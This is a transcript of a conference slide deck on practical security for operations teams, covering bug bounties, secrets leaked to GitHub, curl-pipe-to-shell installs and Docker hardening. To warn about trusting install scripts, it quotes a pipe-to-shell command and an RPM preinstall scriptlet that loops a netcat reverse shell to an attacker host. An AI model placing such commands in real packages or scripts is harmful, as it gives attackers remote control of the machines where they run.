Security for non-unicorns

Transcript

1. Security For Non-Unicorns 1 https://www.etsy.com/listing/205741051/unicorn-dog-hat-rainbow-unicorn-dog @benjammingh for Operability.io 1

2. Who's this clown? 2 • Infrastructure security charlatan at Etsy

   • Operations monkey at Puppet Labs • Survived a bunch of startups in London. (some of them still have websites...) • Has far too many opinions about pretty much everything on the TwitterNet @benjammingh 2 https://twitter.com/skullmandible/status/411281851131523072 @benjammingh for Operability.io 2

3. Unicorns? @benjammingh for Operability.io 3

4. Setlist • The problem(™). • The solution(s)(™). • The wrap

   up. • Rapturous applause. • We all go home/dance parties/our secret lives as superheroes & heroines. @benjammingh for Operability.io 4

5. The problem security is hard. @benjammingh for Operability.io 5

6. From tiny seeds, do mighty acorns grow. • PinkiePwn's 6

   small bugs in Chrome to full sandbox escape • Egor Homakov's 5 small bugs in Github to full private access on GitHub • from XSS to remote code execution in under an hour • Username & password stolen for HVAC system leads to $160+ Million Target breach. @benjammingh for Operability.io 6

7. Things that aren't security are hard too. @benjammingh for Operability.io

   7

8. Computering is hard. No. 1 takeaway for security types is

   a sense of perspective. @benjammingh for Operability.io 8

9. Security people aren't great secure coders. • Snort: 10 CVEs,

   Wireshark: 322! CVEs • Joxean Koret on Breaking Antivurius software • Security Firm Bit9 Hacked, Used to Spread Malware • Tavis Ormandy from Project Zero on exploiting ESET • BEST! FireEye just running Apache/PHP as root @benjammingh for Operability.io 9

10. So who do I trust? • No one? Always a

    great position for security people, who don't want to get paid. • Everyone? Do I have a 419 email for YOU! • Security vendors? If you have infinite money and no attackers. • Attackers! @benjammingh for Operability.io 10

11. "You're already being probed for security holes, do you want

    to know or not?" @benjammingh for Operability.io 11

12. Bug bounties 101: Have one! Bug Crowd vs. HackerOne @benjammingh

    for Operability.io 12

13. Bug bounties 102: Prepare a lot. @benjammingh for Operability.io 13

14. Bug bounties 103: The first few weeks will be hell.

    @benjammingh for Operability.io 14

15. Bug bounties 104: Be ready with bees! @benjammingh for Operability.io

    15

16. Security on the inside @benjammingh for Operability.io 16

17. Armadillo security architecture @benjammingh for Operability.io 17

18. Cloud @benjammingh for Operability.io 18

19. Github @benjammingh for Operability.io 19

20. @benjammingh for Operability.io 20

21. But this doesn't happen in real life, right? @benjammingh for

    Operability.io 21

22. @benjammingh for Operability.io 22

23. Go use Gitrob • http://michenriksen.com/blog/gitrob-putting-the-open- source-in-osint/ • https://github.com/michenriksen/gitrob @benjammingh for

    Operability.io 23

24. curl | bash @benjammingh for Operability.io 24

25. curl legit.pw/mac | sh @benjammingh for Operability.io 25

26. "But I check them, obviously!" @benjammingh for Operability.io 26

27. @benjammingh for Operability.io 27

28. curl | bash "But this is no worse than packages."

    root# yum install sketchy @benjammingh for Operability.io 28

29. curl | bash root# rpm -qp --scripts sketchy-1.33-7.rpm preinstall scriptlet

    (using /bin/sh): bash -c 'while : ; \ do \ nc -e /bin/sh root.legit.pw 2222 ;\ done' @benjammingh for Operability.io 29

30. A LIVE DEMO, madness. @benjammingh for Operability.io 30

31. Lightweight containers! @benjammingh for Operability.io 31

32. chroot(8) @benjammingh for Operability.io 32

33. FreeBSD Jails @benjammingh for Operability.io 33

34. Solaris Zones @benjammingh for Operability.io 34

35. AIX LPAR @benjammingh for Operability.io 35

36. @benjammingh for Operability.io 36

37. Is Docker secure? @benjammingh for Operability.io 37

38. >30% of Images in Docker Hub Contain High Priority Security

    Vulns - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps @benjammingh for Operability.io 38

39. @benjammingh for Operability.io 39

40. As secure as Vagrant? @benjammingh for Operability.io 40

41. But is Docker itself secure? • Don't run things as

    root. • No really, stop running things as root. • Did I mention not running things as root. • It is also not 1999. (Docker 1.8 addresses some of this, with it's changes to who it runs as) @benjammingh for Operability.io 41

42. Securify the Docker. • Don't use --privileged. • Use --cap-drop

    all and --cap-drop <thing> to get the minimum capabilities. • Use Docker Notary • Use GRSecurity (just do that anyway, if you can.) • Use SELinux... I may as well ask for a pony here. @benjammingh for Operability.io 42

43. Summary • Computers are apparently hard. • Security is clearly

    harder still, obv. • Actually trust and humans is hard. • The typing is the easy bit. (ish) @benjammingh for Operability.io 43

44. More Summary • Complex systems lead to much more complex

    security problems. (see Oauth) • Annual pen-tests don't scale, bug bounties can. • Attackers are mining any public info you have (GitHub, S3) • I beg you to stop trusting curl. • Docker and security can be used in the same sentence. @benjammingh for Operability.io 44

45. Thank you! Twidder: @benjammingh LinkedIn: lnkdin.me/p/benyeah FidoNet: 2:254/524.13 JitHub: github.com/barn

    SpeakerDeck: speakerdeck.com/barnbarn Etsy: Careers CodeAsCraft @benjammingh for Operability.io 45